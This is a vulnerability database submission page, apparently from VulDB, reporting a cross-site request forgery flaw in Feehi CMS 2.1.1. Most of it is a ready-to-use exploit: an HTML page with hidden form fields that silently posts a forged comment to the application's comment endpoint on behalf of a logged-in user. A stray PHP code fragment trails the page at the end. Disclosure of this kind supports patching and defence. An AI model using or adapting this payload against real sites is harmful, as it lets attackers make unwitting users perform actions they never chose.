Submeter #52189: Feehi Cms 2.1.1 Csrf Vulnerability Exploitinformação

TítuloFeehi Cms 2.1.1 Csrf Vulnerability Exploit
Descrição# Google Dork: [not applicable] # Date: 14082022 # Exploit Author: haruntamokur # Vendor Homepage: https://feehi.com/ # Software Link: https://github.com/liufee/cms # Version: 2.1.1 (REQUIRED) # Tested on: Windows 10 # CVE : [not applicable] When you log in application with user and password, you reach “Post my comment” tab. The function has Csrf exploit. If you write exploit code like following, you can exploit this vulnerability. URL: http://localhost:8080/index.php?r=article%2Fview&id=22#comment-7 Exploit Code <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://localhost:8080/index.php?r=article%2Fcomment" method="POST"> <input type="hidden" name="&#95;csrf" value="5EgNi95Un03ZlbGkl3dj2u&#95;lxkDWSlBLz0h4q&#95;&#95;4to&#45;rMUHNl2bxCJ2h4calBlacv7&#95;2NqAdJBmpDxKYmsmCuA&#61;&#61;" /> <input type="hidden" name="Comment&#91;aid&#93;" value="22" /> <input type="hidden" name="Comment&#91;content&#93;" value="CSRFTest" /> <input type="hidden" name="comment&#95;post&#95;ID" value="114" /> <input type="hidden" name="Comment&#91;reply&#95;to&#93;" value="0" /> <input type="hidden" name="akismet&#95;comment&#95;nonce" value="32920dc775" /> <input type="hidden" name="ak&#95;js" value="101" /> <input type="hidden" name="comment&#95;mail&#95;notify" value="comment&#95;mail&#95;notify" /> <input type="hidden" name="Comment&#91;nickname&#93;" value="harun" /> <input type="hidden" name="Comment&#91;email&#93;" value="" /> <input type="hidden" name="Comment&#91;website&#95;url&#93;" value="" /> <input type="submit" value="Submit request" /> </form> </body> </html>
Utilizador
 harun.tamokur (UID 35839)
Submissão15/11/2022 11h45 (há 4 anos)
Moderação16/11/2022 08h53 (21 hours later)
EstadoAceite
Entrada VulDB213788 [FeehiCMS Post My Comment Tab Falsificação de Pedido entre Sites]
Pontos17

Want to stay up to date on a daily basis?

Enable the mail alert feature now!

n $_SERVER['REMOTE_ADDR'] ?? '0.0.0.0'; } } ?>